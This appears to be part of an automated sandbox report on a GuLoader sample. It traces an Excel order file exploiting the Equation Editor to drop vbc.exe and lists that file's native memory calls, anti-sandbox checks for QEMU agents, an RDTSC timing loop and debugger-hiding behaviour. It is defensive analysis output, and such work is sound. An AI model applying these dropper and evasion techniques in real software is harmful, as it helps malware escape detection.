Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2615 9_2_001B2615
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2009 9_2_001B2009
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9A38 9_2_001B9A38
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B7C4D 9_2_001B7C4D
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B286A 9_2_001B286A
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B506A 9_2_001B506A
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4E68 9_2_001B4E68
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9A9F 9_2_001B9A9F
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B0886 9_2_001B0886
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2ABC 9_2_001B2ABC
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B32AD 9_2_001B32AD
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B04CB 9_2_001B04CB
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B58CA 9_2_001B58CA
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B32C0 9_2_001B32C0
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B50E1 9_2_001B50E1
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B331E 9_2_001B331E
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2D00 9_2_001B2D00
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2F32 9_2_001B2F32
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B312B 9_2_001B312B
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B7978 9_2_001B7978
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B3172 9_2_001B3172
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2B94 9_2_001B2B94
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B1FBE 9_2_001B1FBE
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2FAC 9_2_001B2FAC
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B99A3 9_2_001B99A3
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B09A0 9_2_001B09A0
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9BC2 9_2_001B9BC2
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B07ED 9_2_001B07ED
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B99E0 9_2_001B99E0
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_023594E2 NtProtectVirtualMemory, 6_2_023594E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354559 NtWriteVirtualMemory, 6_2_02354559
Source: C:\Users\Public\vbc.exe Code function: 6_2_02355B9A NtAllocateVirtualMemory,LoadLibraryA, 6_2_02355B9A
Source: C:\Users\Public\vbc.exe Code function: 6_2_02350DC2 CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA, 6_2_02350DC2
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354C22 NtWriteVirtualMemory, 6_2_02354C22
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235520E NtWriteVirtualMemory, 6_2_0235520E
Source: C:\Users\Public\vbc.exe Code function: 6_2_02355C7F NtAllocateVirtualMemory, 6_2_02355C7F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235506A NtWriteVirtualMemory, 6_2_0235506A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235464E NtWriteVirtualMemory, 6_2_0235464E
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354AAC NtWriteVirtualMemory, 6_2_02354AAC
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354EF8 NtWriteVirtualMemory, 6_2_02354EF8
Source: C:\Users\Public\vbc.exe Code function: 6_2_023550E1 NtWriteVirtualMemory, 6_2_023550E1
Source: C:\Users\Public\vbc.exe Code function: 6_2_023544E2 NtWriteVirtualMemory, 6_2_023544E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_02355CEC NtAllocateVirtualMemory, 6_2_02355CEC
Source: C:\Users\Public\vbc.exe Code function: 6_2_02359531 NtProtectVirtualMemory, 6_2_02359531
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354932 NtWriteVirtualMemory, 6_2_02354932
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358376 NtWriteVirtualMemory,LoadLibraryA, 6_2_02358376
Source: C:\Users\Public\vbc.exe Code function: 6_2_02357B4F NtWriteVirtualMemory, 6_2_02357B4F
Source: C:\Users\Public\vbc.exe Code function: 6_2_02355B4A NtAllocateVirtualMemory, 6_2_02355B4A
Source: C:\Users\Public\vbc.exe Code function: 6_2_023547BA NtWriteVirtualMemory, 6_2_023547BA
Source: C:\Users\Public\vbc.exe Code function: 6_2_02353793 NtWriteVirtualMemory, 6_2_02353793
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354D92 NtWriteVirtualMemory, 6_2_02354D92
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5B9A NtAllocateVirtualMemory, 9_2_001B5B9A
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5C7F NtAllocateVirtualMemory, 9_2_001B5C7F
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5CEC NtAllocateVirtualMemory, 9_2_001B5CEC
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write (reported 2 times)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write (reported 2 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREDA8.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@6/21@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (reported 3 times)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405002 push eax; iretd 6_2_00405004
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040201C push eax; ret 6_2_0040201D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403A30 push ds; iretd 6_2_00403A3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404ADA push eax; iretd 6_2_00404ADC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405A85 push ebx; iretd 6_2_00405A86
Source: C:\Users\Public\vbc.exe Code function: 6_2_004044A2 push ebx; iretd 6_2_004044A6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401CAA pushad ; ret 6_2_00401CB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404536 push FFFFFFD1h; ret 6_2_00404538
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401FC6 pushad ; retf 6_2_00401FC7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404DDE push eax; retf 6_2_00404DE0
Source: C:\Users\Public\vbc.exe Code function: 6_2_004039EA push ds; iretd 6_2_00403A3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_004023FD push es; ret 6_2_004023FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D8C push edx; retf 6_2_00402D8D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040219D push ebx; iretd 6_2_004021AE
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A406 push esp; ret 6_2_0235A407
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A402 push esp; ret 6_2_0235A403
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A40A push esp; ret 6_2_0235A40B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A3F6 push esp; ret 6_2_0235A3F7
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A3F2 push esp; ret 6_2_0235A3F3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A3FE push esp; ret 6_2_0235A3FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A3FA push esp; ret 6_2_0235A3FB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A3EE push esp; ret 6_2_0235A3EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A3EA push esp; ret 6_2_0235A3EB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235A3C8 push esp; ret 6_2_0235A3E7
Source: C:\Users\Public\vbc.exe Code function: 9_2_001BA40A push esp; ret 9_2_001BA40B
Source: C:\Users\Public\vbc.exe Code function: 9_2_001BA402 push esp; ret 9_2_001BA403
Source: C:\Users\Public\vbc.exe Code function: 9_2_001BA406 push esp; ret 9_2_001BA407
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8E4C push eax; ret 9_2_001B8E4D
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4CE7 pushad ; iretd 9_2_001B4CE8
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8F9A push edx; ret 9_2_001B8FA1
Source: C:\Users\Public\vbc.exe Code function: 9_2_001BA3FA push esp; ret 9_2_001BA3FB

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040B9F2 second address: 000000000040B9F2 instructions:
  0x00000000 rdtsc
  0x00000002 cmp edi, 000000A5h
  0x00000008 xor eax, edx
  0x0000000a pand xmm2, xmm7
  0x0000000e jmp 00007FF93438F201h
  0x00000010 cmp ch, 0000003Bh
  0x00000013 dec edi
  0x00000014 cmp dx, 00E4h
  0x00000019 cmp edi, 00000000h
  0x0000001c jne 00007FF93438F126h
  0x00000022 cmp di, 008Dh
  0x00000027 mov ebx, 4E8EE3D3h
  0x0000002c cmp bl, FFFFFFE1h
  0x0000002f sub ebx, E7F2E312h
  0x00000035 cmp ah, 00000049h
  0x00000038 fabs
  0x0000003a jmp 00007FF93438F200h
  0x0000003c xor ebx, 8F76F07Eh
  0x00000042 cmp edx, 4Fh
  0x00000045 add ebx, 16550F41h
  0x0000004b cmp si, 00E6h
  0x00000050 cmp eax, 10h
  0x00000053 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2904 Thread sleep time: -300000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358221 rdtsc 6_2_02358221
Source: C:\Users\Public\vbc.exe System information queried: ModuleInformation
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358221 rdtsc 6_2_02358221
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_02353AB9 mov eax, dword ptr fs:[00000030h] 6_2_02353AB9
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358A83 mov eax, dword ptr fs:[00000030h] 6_2_02358A83
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352F36 mov eax, dword ptr fs:[00000030h] 6_2_02352F36
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358B0B mov eax, dword ptr fs:[00000030h] 6_2_02358B0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235577C mov eax, dword ptr fs:[00000030h] 6_2_0235577C
Source: C:\Users\Public\vbc.exe Code function: 6_2_02357759 mov eax, dword ptr fs:[00000030h] 6_2_02357759
Source: C:\Users\Public\vbc.exe Code function: 6_2_02357DA9 mov eax, dword ptr fs:[00000030h] 6_2_02357DA9
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2F32 mov eax, dword ptr fs:[00000030h] 9_2_001B2F32
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B7759 mov eax, dword ptr fs:[00000030h] 9_2_001B7759
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B577C mov eax, dword ptr fs:[00000030h] 9_2_001B577C
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B7DA9 mov eax, dword ptr fs:[00000030h] 9_2_001B7DA9
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 6_2_023567FF LdrInitializeThunk, 6_2_023567FF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior